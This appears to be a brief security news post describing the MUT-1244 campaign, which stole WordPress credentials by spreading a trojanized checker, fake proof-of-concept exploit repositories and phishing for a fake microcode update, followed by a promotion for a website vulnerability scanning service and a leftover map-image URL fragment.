A hacking group known as “MUT-1244” has stolen more than 390,000 WordPress account credentials in a long-term campaign that targeted security professionals and malicious actors.
MUT-1244 spread an infected credential checker among the information security community along with other tools hosted on GitHub write Cyber Security Technologist James Galbraith.
This attack specifically targeted penetration testers and security researchers, as well as other malicious actors.
By selectively distributing infected code MUT-1244 was able to steal credentials directly from individuals who harvested them for malicious or legitimate use.
This sophisticated attack did not directly target the owners of the WordPress account credentials.
The primary focus of the attack was through a WordPress plugin often used by security professionals to check compromised credentials on web servers.
When executed, this malicious plugin captured sensitive data such as the WordPress credentials, SSH keys, and AWS access keys, all of which were then extracted to the infrastructure of MUT-1244.
Other more targeted methods of compromise included creating fake repositories with malicious Proof of Concept (PoC) exploits. These exploits targeted known vulnerabilities, and were used by red-team penetration testers and security professionals.
Another method was a more traditional phishing campaign, where victims received emails that urged them to install a fake CPU microcode update. Once this fake update was installed, the payload was pulled down from MUT-1244’s Infrastructure, and then executed.
Indelible Data offers a new website vulnerability scanning service called Threatsure that helps ensure that security updates are maintained on web sites and vulnerabilities are patched. Find out more here
/-3.5042587517567103,%2054.70635734010168,15.5/300X450@2X?access_token=pk.eyJ1Ijoid29tYmF0Y2hyaXMiLCJhIjoiY2pqaGEyd2lzMDQ3ZDN2bWQ4OTBsa2pmayJ9.ksVq6arM13qYhr76pco33w)